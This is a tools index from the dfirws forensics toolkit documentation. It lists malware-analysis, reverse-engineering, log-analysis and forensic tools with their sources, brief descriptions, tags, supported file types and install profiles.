Categories

Categories generated from dfirws shortcuts.

Categories Index

Tools Index

Tool Source Description Tags File Extensions Profiles
4n4lDetector GitHub Release Advanced static analysis tool malware-analysis, pe-analysis, detection .exe, .dll Full only
7-Zip Installer 7-Zip is a file archive tool.
@marp-team/marp-cli npm A CLI interface for Marp and Marpit based converters. Markdown presentations. markdown, office, documentation .md, .markdown
acquire Python forensics, incident-response, acquisition, disk-forensics .tar
adalanche GitHub Release Attack Graph Visualizer and Explorer (Active Directory) ...Who's really Domain Admin? windows, network-analysis, threat-intelligence, visualization Full only
admonitions GitHub Release Obsidian admonitions plugin. markdown, plugins Full only
ai-fs-proxy Git IP over filesystem. ai, filesystem
aiodns Python network, dns
aiohttp Python network, http
aLEAPP GitHub Release ALEAPP is a tool for parsing and analyzing Android logs, events, and protobuf files. It can be used to extract artifacts from Android devices and analyze them in a structured way. mobile-forensics, android, artifact-extraction .tar, .zip
Amazon Corretto 21 Installer Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). java .java
Android SDK Platform Tools HTTP Android SDK Platform Tools include ADB and Fastboot for Android device management. android, mobile-forensics, debugging Full only
API Monitor HTTP API Monitor is a tool for monitoring Windows API calls. reverse-engineering, api-tracing, dynamic-analysis .exe, .dll
apktool HTTP apktool is a tool for reverse engineering Android APK files. reverse-engineering, android, decompiler .apk
APT-Hunter Git APT-Hunter is a threat hunting tool for Windows event logs, built with a purple-team mindset to detect APT movements hidden in the sea of Windows event logs and to decrease the time needed to uncover suspicious activity. event-log, threat-hunting .evtx
Ares GitHub Release Automated decoding of encrypted text without knowing the key or ciphers used malware-analysis, pe-analysis .exe, .dll
artemis GitHub Release Artemis is a tool for extracting and analyzing Windows artifacts. It can be used for triage and forensic analysis of Windows systems, allowing investigators to quickly gather information about the system and its activity. forensics, artifact-extraction, triage .exe, .dll, .evtx, .reg
ASL Git Detect packer, compiler, protector, .NET obfuscator, PUA application pe-analysis, packer-detection .exe
Aspose.Email-for-Python-via-Net Python email, forensics, data-extraction .msg, .eml, .pst, .ost, .mbox
Audacity GitHub Release Audacity is a free and open-source audio editing software. audio, steganography .wav, .mp3, .flac, .ogg, .aiff Full only
autoit-ripper Python Extract AutoIt scripts embedded in PE binaries. malware-analysis, scripting, deobfuscation .exe
Autopsy Winget Autopsy is a digital forensics platform that allows users to analyze disk images and extract artifacts from them. It provides a graphical user interface for examining file systems, recovering deleted files, and analyzing network traffic. disk-forensics, forensics, gui, artifact-extraction .dd, .raw, .E01, .img, .vmdk Full only
autopsy_addon_modules Git Collection of third-party add-on modules for Autopsy — ingest modules, content viewers, report modules, and data source processors. forensics, disk-forensics, plugins, documentation
Azure CLI HTTP Azure CLI is a command-line tool for managing Azure resources. Full only
BeaconHunter GitHub Release Detect and respond to Cobalt Strike beacons using ETW. malware-analysis, cobalt-strike, memory-forensics .dmp, .exe, .dll
BeautifulSoup4 Python web, parsing, data-extraction .html, .htm, .xml
Binary Ninja HTTP Binary Ninja is a reverse engineering platform. reverse-engineering, disassembler, decompiler .exe, .dll, .elf, .bin, .so, .dylib Full only
binary-refinery Python The Binary Refinery is a collection of Python scripts that implement transformations of binary data such as compression and encryption. We will often refer to it simply by refinery, which is also the name of the corresponding package. malware-analysis, deobfuscation, data-extraction, scripting .exe, .dll, .bin
binlex GitHub Release binlex is a binary genetic traits lexer for malware analysis. malware-analysis, binary-analysis, binary-diffing .exe, .dll, .elf, .bin
bitstruct Python binary-analysis, data-processing
BlueTuxedo Git A tiny tool built to find and fix common misconfigurations in Active Directory-integrated DNS windows, network-analysis, dns
bmc-tools Git RDP Bitmap Cache parser forensics, network, windows
box-js npm A tool for studying JavaScript malware. malware-analysis, javascript, dynamic-analysis, deobfuscation .js
bulk_extractor HTTP bulk_extractor extracts features such as email addresses and URLs from disk images. forensics, carving, data-extraction .dd, .raw, .E01, .img
Burp Suite Winget Burp Suite is an integrated platform for performing security testing of web applications. It provides a wide range of tools for intercepting HTTP traffic, analyzing web applications, and automating security testing tasks. web, security-testing, network Full only
bytecode-viewer GitHub Release A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More) reverse-engineering, java, decompiler, deobfuscation .class, .jar, .apk, .dex
cabarchive Python compression, data-extraction .cab
capa GitHub Release capa rules for identifying capabilities in binaries. malware-analysis, pe-analysis, reverse-engineering, mitre-attack .exe
capa Explorer Web HTTP capa Explorer Web is a web UI for exploring capa results. malware-analysis, visualization .exe, .dll Full only
capa-rules GitHub Release Rules for capa.
CapaExplorer Git Capa analysis importer for Ghidra. reverse-engineering, malware-analysis, visualization, plugins
cart Python Compressed and RC4 Transport (CaRT) Neutering format. This is a file format that is used to neuter malware files for distribution in the malware analyst community. malware-analysis .cart
chainsaw GitHub Release Rapidly Search and Hunt through Windows Forensic Artefacts log-analysis, incident-response, sigma, detection .evtx
chainsaw-rules Git A set of custom Chainsaw rules for event log threat hunting. sigma, detection-rules
chepy Python Chepy is a Python library with a handy CLI that aims to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put into Chepy to make it compatible with the various functionalities that CyberChef offers, all in a pure Pythonic manner. data-processing, encoding, decoding, deobfuscation, hashing .bin, .txt, .hex
Chrome Winget Chrome is a widely used web browser developed by Google. It offers fast browsing, a user-friendly interface, and a wide range of extensions and developer tools, making it popular for both general web browsing and web development. browser, web .html, .htm, .js, .css Full only
CimSweep Git CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. windows, forensics
ClamAV Installer ClamAV is an open-source antivirus engine for detecting malware. Full only
cmder GitHub Release Cmder is a console emulator for Windows. terminal, shell Full only
CobaltStrikeScan GitHub Release Scan files or process memory for CobaltStrike beacons and parse their configuration malware-analysis, cobalt-strike, detection .exe, .dll, .dmp, .bin
ComparePlus GitHub Release A diff plugin for Notepad++. text-editor, binary-diffing, plugins
compressed_rtf Python office, rtf, data-extraction .rtf
csvkit Python A suite of command-line tools for working with CSV, the king of tabular file formats. csv, data-processing, cli .csv
CuTE-tui Cargo CuTE-tui is a terminal user interface (TUI) tool for making HTTP requests and analyzing responses. It provides a user-friendly interface for crafting and sending HTTP requests, as well as viewing and analyzing the responses. This tool can be useful for testing APIs, debugging web applications, and performing various HTTP-related tasks from the command line. tui, http, network
Cutter GitHub Release Cutter is a Qt and C++ GUI powered by Rizin that provides an intuitive interface for reverse engineering and analyzing binaries across multiple platforms. reverse-engineering, disassembler, decompiler, gui .exe, .dll, .elf, .bin, .so, .dylib Full only
cutter-jupyter Git Jupyter Plugin for Cutter. reverse-engineering
cutterref Git Cutter Instruction Reference Plugin reverse-engineering, documentation, plugins
CVE Data Enrichment CVE list data from the CVEProject cvelistV5 repository. vulnerability, threat-intelligence .json, .zip
CyberChef GitHub Release CyberChef is a web app for data processing and analysis. It provides a wide range of operations for encoding, decoding, encrypting, decrypting, and analyzing data. data-processing, encoding, decoding, deobfuscation, encryption, hashing .bin, .txt, .json, .hex
DB Browser for SQLite GitHub Release DB Browser for SQLite is a high quality, visual, open source tool for creating, designing, and editing database files compatible with SQLite. database, sqlite, gui .db, .sqlite, .sqlite3
DBeaver GitHub Release DBeaver is a database management tool. database, gui .db, .sqlite, .sqlite3, .sql Full only
DCode HTTP DCode is a date/time conversion and analysis tool. metadata, forensics, decoding
debloat GitHub Release A GUI and CLI tool for removing bloat from executables malware-analysis, pe-analysis, deobfuscation .exe, .dll
decai Git r2js plugin for radare2 with special focus on AI-assisted decompilation. Installed by copying decai.r2.js to the radare2 plugins directory. reverse-engineering, ai, decompiler .exe, .dll, .elf, .bin, .so
deep_translator Python A flexible free and unlimited python tool to translate between different languages in a simple way using multiple translators data-processing
defender-detectionhistory-parser Git A parser of Windows Defender's DetectionHistory forensic artifact, containing substantial info about quarantined files and executables. windows, malware-detection, forensics
DensityScout HTTP DensityScout calculates file entropy and density. malware-analysis, entropy-analysis .exe, .dll, .bin
deobfuscator npm javascript-obfuscator cleaner & deobfuscator javascript, deobfuscation, malware-analysis .js
deobshell Git Powershell script deobfuscation using AST in Python. powershell, deobfuscation, malware-analysis
Dependencies GitHub Release Dependencies is a tool to view dependencies of Windows binaries. dependencies, binary-analysis, windows .exe, .dll
Detect It Easy GitHub Release Detect It Easy is a tool for identifying file types and detecting packers. pe-analysis, file-analysis, packer-detection .exe, .dll, .elf, .mach-o, .bin
dfir-toolkit Cargo The dfir-toolkit is a collection of command-line tools for digital forensics and incident response (DFIR) tasks. It includes various utilities for analyzing log files, registry hives, MFT files, and other artifacts commonly encountered in DFIR investigations. forensics, timeline, log-analysis, event-log, registry, bodyfile .evtx, .reg, .dat, .lnk, .pf, .mft, .zip
dfir-unfurl Python osint, network, forensics, visualization
dfir_ntfs Python An NTFS/FAT parser for digital forensics & incident response. ntfs, filesystem, forensics, disk-forensics .mft, .dd, .raw, .img
DFIRArtifactMuseum Git The goal of this repo is to archive artifacts from all versions of various OSes and categorize them by type. This will help with artifact validation processes as well as increase access to artifacts that may no longer be readily available. forensics, artifact-extraction, documentation
dfirws-sample-files Git Sample files to test forensics tools. forensics
dictionaries Git Dictionaries and related code and data for Libreoffice. password-cracking, office
dissect Python forensics, incident-response, data-extraction .dd, .raw, .tar
dissect.target Python forensics, incident-response, artifact-extraction .dd, .raw, .tar, .vmdk, .E01
DitExplorer GitHub Release Tool for viewing NTDS.dit Active Directory database files. windows, network-analysis, forensics .dit
dll_to_exe GitHub Release Converts a DLL into EXE pe-analysis, conversion .dll, .exe
dnslib Python network, dns
dnSpy GitHub Release dnSpy is a .NET debugger and decompiler. It can be used to analyze and debug .NET applications, including malware. dotnet, debugging, reverse-engineering
docsify-cli npm A magical documentation generator. documentation, markdown .md, .html
docx2txt Python A pure python-based utility to extract text and images from docx files. office, data-extraction .docx
Dokany GitHub Release User mode file system library for windows with FUSE Wrapper filesystem, disk-forensics Full only
DotNet 6 Desktop Runtime Installer The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 6.0. dotnet
DotNet 8 Desktop Runtime Winget The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 8.0. dotnet
DotNet 9 Desktop Runtime Winget The .NET Desktop Runtime enables you to run existing Windows desktop applications. This release includes the .NET Runtime; you don't need to install it separately. Version 9.0. dotnet
dotnetfile Git dotnetfile is a Common Language Runtime (CLR) header parser library for Windows .NET files built in Python. The CLR header is present in every Windows .NET assembly beside the Portable Executable (PE) header. It stores a plethora of metadata information for the managed part of the file. pe-analysis, dotnet
dotnetfile Python pe-analysis, dotnet .exe, .dll
dpkt Python network-analysis, pcap, protocol-analysis .pcap, .pcapng
DSpellCheck GitHub Release A spell-checker plugin for Notepad++. text-editor, plugins
dsq GitHub Release Commandline tool for running SQL queries against JSON, CSV, Excel, Parquet, and more. data-processing, database, json, csv .json, .csv, .tsv, .parquet
Dumpbin GitHub Release Microsoft COFF Binary File Dumper: Extract from Visual Studio MSVC Tools pe-analysis, reverse-engineering .exe, .dll, .obj, .lib
edit GitHub Release Edit is a simple text editor for Windows made by Microsoft. text-editor
Elastic Stack (ELK + Beats) HTTP Downloads Elasticsearch, Kibana, Logstash, Elastic Agent, and Beats. siem, log-analysis, search, visualization .json, .log Full only
elasticsearch Python database, log-analysis, search, siem
Elfparser-ng GitHub Release Multiplatform CLI and GUI tool to show information about ELF files. reverse-engineering, elf-analysis, linux .elf, .so
EmailAnalyzer Git With EmailAnalyzer you can analyze your suspicious emails. You can extract headers, links, and hashes from the .eml file and you can generate reports. email, forensics, phishing .eml
ese-analyst Git This is a set of tools for doing forensics analysis on Microsoft ESE databases. forensics, windows, database, csv .dat
evtx Python log-analysis, event-log, windows .evtx
EVTX-ATTACK-SAMPLES Git Windows Events Attack Samples. event-log, mitre-attack .evtx
evtx_dump GitHub Release A Fast (and safe) parser for the Windows XML Event Log (EVTX) format log-analysis, event-log, windows .evtx
ExifTool HTTP ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. metadata, file-analysis .jpg, .jpeg, .png, .gif, .tiff, .pdf, .doc, .docx, .mp4
extract-msg Python Extracts emails and attachments saved in Microsoft Outlook's .msg files email, data-extraction .msg
FASM HTTP FASM is a fast assembler for x86 and x86-64 architectures. reverse-engineering .asm
ffmpeg GitHub Release ffmpeg is a free and open-source multimedia framework for processing video and audio files. It can be used to convert between different formats, extract audio from video files, and perform various other multimedia processing tasks. audio, conversion .mp4, .avi, .mkv, .mov, .mp3, .wav, .flac Full only
Fibratus GitHub Release Adversary tradecraft detection, protection, and hunting windows, monitoring .etl Full only
Firefox Winget Firefox is a fast and secure web browser that can be used to browse the internet, view websites, and manage bookmarks and passwords. browser, web .html, .htm, .js, .css Full only
Flare-Fakenet-NG GitHub Release FakeNet-NG - Next Generation Dynamic Network Analysis Tool malware-analysis, network, dynamic-analysis .pcap
Flare-Floss GitHub Release Flare-Floss is a tool for extracting strings from malware samples. malware-analysis, string-extraction, deobfuscation .exe, .dll, .bin
flatten_json Python Flatten JSON objects python, json .json
flow.record Python forensics, data-processing .rec
forensic-timeliner GitHub Release A high-speed forensic timeline engine for Windows forensic artifact CSV output built for DFIR investigators. Quickly consolidate CSV output from processed triage evidence for Eric Zimmerman (EZ Tools) Kape, Axiom, Hayabusa, Chainsaw and Nirsoft into a unified timeline. forensics, timeline .evtx, .csv, .json Full only
Foxit PDF Reader Winget Foxit PDF Reader is a lightweight and fast PDF viewer that can be used to open and view PDF files. It is an alternative to Adobe Acrobat Reader and offers features such as annotation, form filling, and digital signatures. pdf, viewer .pdf Full only
fq GitHub Release jq for binary formats - tool, language and decoders for working with binary and text formats data-processing, binary-analysis, file-analysis .pcap, .pcapng, .mp4, .mp3, .flac, .zip, .tar, .gif, .png
fqlite GitHub Release FQLite - SQLite Forensic Toolkit. FQLite is a tool to find and restore deleted records in SQLite databases. It examines the database for entries marked as deleted. database, sqlite, forensics .db, .sqlite, .sqlite3 Full only
frida-tools Python Frida CLI tools. reverse-engineering, dynamic-analysis .exe, .apk, .ipa
FullEventLogView HTTP FullEventLogView is a tool for viewing Windows event logs. log-analysis, event-log, windows .evtx
fx GitHub Release fx is a terminal JSON viewer and processor. json, data-processing, visualization .json, .jsonl
geoip2 Python geolocation, network, maxmind .mmdb
Geolocus Enrichment Geolocus MMDB geolocation database. geolocation, mmdb .mmdb
geolocus-cli HTTP geolocus-cli is a geolocation lookup tool. geolocation, osint .json
gftrace GitHub Release A command line Windows API tracing tool for Golang binaries. reverse-engineering, api-tracing, golang .exe
Ghidra Installer Ghidra is a software reverse engineering (SRE) framework developed by NSA's Research Directorate. Full only
Ghidra BTIGhidra GitHub Release Binary Type Inference Ghidra Plugin reverse-engineering, disassembler, decompiler .exe, .dll, .elf, .bin, .so
Ghidra Cartographer GitHub Release Code Coverage Exploration Plugin for Ghidra. reverse-engineering, disassembler, visualization .exe, .dll, .elf, .bin, .so
Ghidra GhidrAssistMCP GitHub Release Ghidra extension implementing MCP server for AI-assisted reverse engineering. Enable in Ghidra via File > Configure > Configure Plugins. Server runs on localhost:8080 by default. reverse-engineering, mcp, ai, plugins .exe, .dll, .elf, .bin, .so
Ghidra GolangAnalyzerExtension GitHub Release GoLang extension for Ghidra. reverse-engineering, golang .exe, .elf
ghidrecomp Python Python Command-Line Ghidra Decompiler. reverse-engineering, decompiler .exe, .dll, .elf
ghidriff Python Ghidra Binary Diffing Engine. reverse-engineering, binary-diffing .exe, .dll, .elf
git Installer A fork of Git containing Windows-specific patches.
go-size-analyzer GitHub Release go-size-analyzer (gsa) is a tool to analyze the size of Go binaries. golang, binary-analysis .exe, .dll
god-mode-rules Git God Mode Detection Rules yara, sigma, detection-rules
godap GitHub Release godap is a tool for analyzing Active Directory LDAP data. windows, network-analysis, network Full only
GoLang Installer Go programming language.
Google Earth Pro Winget Google Earth Pro is a tool for viewing satellite imagery, maps, and geographic information. It can be used for geolocation analysis, visualizing data, and exploring geographic features. geolocation, osint, visualization .kml, .kmz Full only
gootloader Git Collection of scripts used to deobfuscate GOOTLOADER malware samples. malware-analysis
GoReSym Git Go symbol recovery tool reverse-engineering, golang
GoReSym GitHub Release Go symbol recovery tool. reverse-engineering, golang .exe, .elf
gostringungarbler Git Python tool to resolve all strings in Go binaries obfuscated by garble. reverse-engineering, golang, deobfuscation
Gpg4win HTTP Gpg4win provides GnuPG and related tools for Windows. encryption .gpg, .asc, .pgp
Graphviz HTTP Graphviz is a graph visualization software suite. visualization, graph .dot, .gv
graphviz Python visualization, graph .dot, .gv
grip Python Render local readme files before sending off to GitHub. markdown, viewer .md
gron GitHub Release gron makes JSON greppable by transforming it into discrete assignments that can be easily searched and filtered using standard command-line tools. json, data-processing, search .json
gti-dev-kit Git The Google Threat Intelligence dev kit is a collection of example code to quickly develop functional integrations with the GTI API, enabling a unified view of the threat landscape and reducing manual effort in threat analysis. malware-detection, threat-intelligence
h2database GitHub Release H2 Database is an open source Java SQL database. database, java .h2.db Full only
hachoir Python Hachoir is a Python library to view and edit a binary stream field by field. In other words, Hachoir allows you to "browse" any binary stream just like you browse directories and files. binary-analysis, metadata, file-analysis .exe, .dll, .png, .jpg, .zip, .tar, .gz
hashcat HTTP hashcat is a password recovery tool. password-cracking, hashing Full only
hayabusa GitHub Release Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs. log-analysis, event-log, sigma, detection, timeline, incident-response .evtx
hayabusa-rules Git Curated Windows event log Sigma rules used in Hayabusa and Velociraptor. event-log, detection-rules, sigma .evtx
hexdump Python hex-editor, binary-analysis .bin
hfs GitHub Release hfs is a simple HTTP file server for Windows. http, network
HiddenWave Git Hide Your Secret Message in any Wave Audio File. steganography, audio, ctf .wav
HindSight GitHub Release Browser forensics tool for Google Chrome (and other Chromium-based browsers). browser-forensics, browser, artifact-extraction .db, .sqlite
HollowsHunter GitHub Release Scans running processes. Recognizes and dumps a variety of in-memory implants malware-analysis, pe-analysis, dynamic-analysis .exe, .dll, .dmp
HxD HTTP HxD is a hex editor, disk editor, and memory editor for Windows. hex-editor, binary-analysis .exe, .dll, .bin, .hex
Iaito GitHub Release iaito is the official graphical interface for radare2, a libre reverse engineering framework. reverse-engineering, disassembler, gui .exe, .dll, .elf, .bin, .so
IDR Git Interactive Delphi Reconstructor reverse-engineering, decompiler
iLEAPP GitHub Release iLEAPP is a tool for parsing and analyzing iOS logs, events, and plists. It can be used to extract artifacts from iOS devices and analyze them in a structured way. mobile-forensics, artifact-extraction .tar, .zip
ILSpy GitHub Release ILSpy is a .NET assembly browser and decompiler. dotnet, decompiler, reverse-engineering .exe, .dll
ImHex GitHub Release ImHex is a hex editor for binary analysis and pattern language. hex-editor, binary-analysis, reverse-engineering .exe, .dll, .bin, .hex, .elf
Incident-Response-Powershell Git PowerShell Digital Forensics & Incident Response Scripts. incident-response, powershell
INDXRipper GitHub Release Carve file metadata from NTFS index ($I30) attributes ntfs, filesystem, forensics, metadata .bin
IPinfo Country ASN Enrichment IPinfo.io free IP to Country and ASN database in MMDB format. Requires IPINFO_API_KEY. geolocation, network .mmdb
IrfanView Winget IrfanView is a fast and compact image viewer and editor for Windows. It supports a wide range of image formats and provides basic editing features, making it useful for quickly viewing and manipulating images. viewer .jpg, .jpeg, .png, .gif, .bmp, .tiff, .ico, .webp
iShutdown Git iShutdown scripts: extracts, analyzes, and parses Shutdown.log forensic artifact from iOS Sysdiagnose archives mobile-forensics, forensics
jadx GitHub Release Dex to Java decompiler reverse-engineering, android, decompiler, java, deobfuscation .apk, .dex, .jar, .class, .zip Full only
JavaFX SDK HTTP JavaFX SDK provides UI libraries for Java applications. java, gui .jar
javaobj-py3 Python
jd-gui GitHub Release A standalone Java Decompiler GUI reverse-engineering, java, decompiler .class, .jar
jpterm Python Jupyter in the terminal. python, data-processing, tui .json
jq GitHub Release jq is a powerful command-line JSON processor that allows you to parse, filter, and manipulate JSON data with ease. It supports a wide range of operations, including selecting specific fields, transforming data, and performing complex queries. With its simple syntax and extensive functionality, jq is an essential tool for anyone working with JSON data in the command line. json, data-processing, cli .json, .ndjson, .jsonl
jsbeautifier Python JavaScript unobfuscator and beautifier. javascript, deobfuscation .js
jsdom npm jsdom is a pure-JavaScript implementation of many web standards, notably the WHATWG DOM and HTML Standards, for use with Node.js. In general, the goal of the project is to emulate enough of a subset of a web browser to be useful for testing and scraping real-world web applications. javascript, parsing .html, .htm, .js
Jumplist Browser GitHub Release Automatic/Custom Destinations & LNK (MS-SHLLINK) Browser windows, forensics, artifact-extraction .automaticDestinations-ms, .customDestinations-ms, .lnk
jupyter-collection Git Collection of Jupyter Notebooks by @fr0gger_ python
jupyterlab Python JupyterLab computational environment python, data-processing .ipynb
jwt-cli GitHub Release A super fast CLI tool to decode and encode JWTs built in Rust web, security-testing, decoding
keystone-engine Python reverse-engineering
LeechCore.wiki Git GitHub wiki for LeechCore. memory-forensics, documentation
legacy-sigmatools Git Legacy Sigma Tools (sigmac etc.) sigma, detection-rules
lessmsi GitHub Release lessmsi is a tool to view and extract the contents of a Windows Installer (.msi) file. windows .msi
libimobiledevice-windows Git A Windows port of libimobiledevice, a cross-platform library to communicate with iOS devices. It includes tools for extracting data from iOS devices, such as lockdown, idevicebackup2, and more. mobile-forensics, forensics
LibreOffice HTTP LibreOffice is a free and open-source office suite. office, viewer .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp Full only
lief Python pe-analysis, elf-analysis, binary-analysis .exe, .dll, .elf, .mach-o
litecli Python CLI for SQLite Databases with auto-completion and syntax highlighting. database, sqlite, cli .db, .sqlite
LnkParse3 Python Windows Shortcut file (LNK) parser windows, forensics, file-analysis .lnk
LogBoost GitHub Release Convert a variety of log formats to CSV while enriching detected IPs with Geolocation, ASN, DNS, WhoIs, Shodan InternetDB and Threat Indicator matches. log-analysis, event-log .evtx, .csv, .json Full only
Loki GitHub Release Loki - Simple IOC and YARA Scanner malware-analysis, ioc-scanner, yara, detection .exe, .dll, .bin
LUMEN npm Your Browser-based EVTX Companion. log-analysis, event-log, forensics, visualization .evtx
maclookup Python network
magika Python A tool to determine the content type of a file with deep learning. file-analysis, ai
Mail Viewer HTTP Mail Viewer is a tool for viewing email files and mailboxes. email, forensics .eml, .msg
Malcat Lite HTTP Malcat is a malware analysis and reverse engineering tool. pe-analysis, malware-analysis, hex-editor, disassembler .exe, .dll, .elf, .bin, .sys
maldump Python Maldump makes it easy to extract quarantined files of multiple AVs from a live system or a mounted disk image. malware-analysis, malware-detection
malware-bazaar-advanced-search Git Script to chain search parameters for MalwareBazaar malware-analysis, threat-intelligence
malwarebazaar Python CLI wrapper for malware bazaar API (bazaar.abuse.ch) and YARAify API (yaraify.abuse.ch) malware-analysis, threat-intelligence, ioc-scanner
markitdown Python Utility tool for converting various files to Markdown. conversion, markdown, data-extraction, office .docx, .xlsx, .pptx, .pdf, .html
MasterParser Git MasterParser is a powerful DFIR tool designed for analyzing and parsing Linux logs log-analysis, linux, security-testing .log
matplotlib Python visualization
MaxMind GeoLite2 ASN Enrichment MaxMind GeoLite2 ASN database for mapping IP addresses to Autonomous System Numbers. Requires MAXMIND_LICENSE_KEY. geolocation, network, maxmind .mmdb, .tar.gz
MaxMind GeoLite2 City Enrichment MaxMind GeoLite2 City database for mapping IP addresses to city-level geolocation. Requires MAXMIND_LICENSE_KEY. geolocation, maxmind .mmdb, .tar.gz
MaxMind GeoLite2 Country Enrichment MaxMind GeoLite2 Country database for mapping IP addresses to countries. Requires MAXMIND_LICENSE_KEY. geolocation, maxmind .mmdb, .tar.gz
mboxviewer GitHub Release A small but powerful app for viewing MBOX files. email, forensics .mbox, .eml
mcp-server-elasticsearch GitHub Release MCP server to connect to elastic 8.X mcp, ai, log-analysis
MemProcFS GitHub Release MemProcFS is an easy and convenient way of viewing physical memory as files in a virtual file system. memory-forensics, filesystem .dmp, .raw, .vmem, .img
MemProcFS.wiki Git GitHub wiki for MemProcFS memory-forensics, documentation
MetadataPlus GitHub Release A tool to use novel locations to extract metadata from Office documents. metadata, file-analysis .exe, .dll, .doc, .docx, .xls, .xlsx, .pdf, .jpg, .png
MEX HTTP MEX is an extension for WinDbg. debugging, dotnet .dmp
MFTBrowser GitHub Release $MFT directory tree reconstruction & FILE record info ntfs, filesystem, forensics .mft
Microsoft OpenJDK 11 HTTP Microsoft's OpenJDK 11 java
Microsoft.etl2pcapng Winget Microsoft.etl2pcapng is a tool for converting ETL (Event Trace Log) files to PCAPNG format, allowing you to analyze network traffic captured in ETL files using tools like Wireshark. network-analysis, pcap, protocol-analysis .etl
minidump Python Python library to parse Windows minidump file format. memory-forensics, windows .dmp
MiTeC Structured Storage Viewer HTTP Full-featured MS OLE Structured Storage based file management tool. office, ole, data-extraction .doc, .xls, .ppt, .msg
mkyara Python yara, detection-rules, malware-analysis .exe, .dll, .bin
mmdbinspect GitHub Release Tool for inspecting MaxMind GeoIP2 databases. geolocation, maxmind .mmdb
MsgViewer GitHub Release A tool for viewing and analyzing Outlook MSG files. email, forensics .msg
msidump Python MSI Dump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. ioc, data-extraction, enrichment, parsing, forensics .msi
msoffcrypto-tool Python Python tool and library for decrypting and encrypting MS Office files using a password or other keys office, encryption, decryption .doc, .docx, .xls, .xlsx, .ppt, .pptx
MSRC Git Data from Microsoft patch tuesdays. vulnerability, windows
msticpy Python threat-intelligence, incident-response, python .json, .csv
mwcp Python A framework for malware configuration parsers. malware-analysis, data-extraction .exe, .dll, .bin
name-that-hash Python The Modern Hash Identification System. hashing, file-analysis
Neo4j HTTP Neo4j is a graph database. database, graph, visualization Full only
neo4j Python database, graph
Neovim Winget Neovim is a terminal-based text editor that can be used for editing scripts, notes, and other text files. It is a fork of Vim with additional features and improvements. text-editor, code-editor, terminal .txt, .md, .log, .ps1, .py, .rb, .js
Nerd Fonts GitHub Release Nerd Fonts for terminal and more. terminal .ttf, .otf
netaddr Python A network address manipulation library for Python. network
NetExt GitHub Release WinDbg extension for data mining the managed heap. It also includes commands to list HTTP requests, WCF services and WIF tokens, among others. debugging, memory-forensics, dotnet, plugins .dmp
NetworkMiner HTTP NetworkMiner is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files. network-analysis .pcap, .pcapng, .etl Full only
networkx Python visualization, graph
NirSoft Browser Utilities HTTP NirSoft browser utilities for cache and history analysis. browser-forensics, artifact-extraction .db, .sqlite
Nmap HTTP Nmap is a network exploration and security auditing tool. network-analysis, security-testing, osint
NodeJS Installer Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. javascript, nodejs .js
Notepad++ GitHub Release Notepad++ is a free source code editor and Notepad replacement that supports several programming languages. text-editor .txt, .log, .xml, .json, .csv, .ps1, .py, .js
Npcap HTTP Npcap packet capture driver installer. network-analysis, pcap .pcap, .pcapng
numpy Python Fundamental package for array computing in Python. data-processing
Obsidian Winget Obsidian is a powerful knowledge management and note-taking application that allows you to create and link notes in a graph-based structure. markdown .md, .markdown Full only
obsidian-calendar-plugin GitHub Release Obsidian calendar plugin. markdown, plugins Full only
obsidian-dataview GitHub Release Obsidian dataview plugin. markdown, data-processing, plugins Full only
obsidian-excalidraw-plugin GitHub Release Obsidian Excalidraw plugin. markdown, plugins Full only
obsidian-kanban GitHub Release Obsidian Kanban plugin. markdown, plugins Full only
obsidian-mitre-attack GitHub Release A vault for Obsidian.md containing the MITRE ATT&CK framework in markdown format. markdown, mitre-attack, threat-intelligence Full only
obsidian-tasks GitHub Release Obsidian tasks plugin. markdown, plugins Full only
obsidian-timeline GitHub Release Obsidian timeline plugin. markdown, timeline, plugins Full only
OfficeMalScanner Git OfficeMalScanner can scan old office documents. office, vba, malware-analysis .doc, .ppt, .xls
oh-my-posh Winget Oh My Posh is a customizable prompt for PowerShell and other shells. It allows you to create beautiful and functional command-line prompts with themes and customizations. terminal, shell
olefile Python office, ole, data-extraction .doc, .xls, .ppt, .msg
oletools Python Python tools to analyze security characteristics of MS Office and OLE files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), for Malware Analysis and Incident Response #DFIR. office, malware-analysis, vba .doc, .docx, .xls, .xlsx, .ppt, .pptx, .rtf
one-extract Git Python library for extracting objects from OneNote files. forensics, office, data-extraction
opencode-ai npm AI coding agent for the terminal with MCP server support. Configured with MCP servers for Ghidra (GhidrAssistMCP), radare2 (r2mcp), and regipy. ai, automation, mcp .txt, .md, .log, .json
openpyxl Python office, data-extraction .xlsx
OpenVPN Winget OpenVPN is a widely used open-source VPN solution that allows you to create secure connections over the internet. It is designed to be flexible and secure, supporting various authentication methods and encryption protocols. network .ovpn Full only
orjson Python json, data-processing .json
OSFMount Winget OSFMount is a tool for mounting disk images and virtual hard disks as virtual drives. It can be used for analyzing disk images, accessing files within them, and performing forensic analysis on the mounted images. disk-forensics, filesystem .dd, .raw, .E01, .img, .vmdk, .iso
PacketCircle Git Wireshark Plugin for traffic-matrix visualization. network, plugins, visualization .pcap, .pcapng
paramiko Python network, scripting
PatchaPalooza Git A comprehensive tool that provides an insightful analysis of Microsoft's monthly security updates. vulnerability, windows, binary-diffing
pathlab Python forensics, filesystem
pcode2code Python A vba p-code decompiler based on pcodedmp office, vba, decompiler .doc, .xls, .ppt
pdfalyzer Python Analyze PDFs with colors (and YARA). Visualize a PDF's inner tree-like data structure, check it against a library of YARA rules, force decodes of suspicious font binaries, and more. pdf, malware-analysis, visualization .pdf
PDFStreamDumper HTTP PDFStreamDumper is a tool for inspecting PDF files. pdf, malware-analysis, javascript .pdf
PE-bear GitHub Release A tool for analyzing PE files pe-analysis, reverse-engineering .exe, .dll, .sys
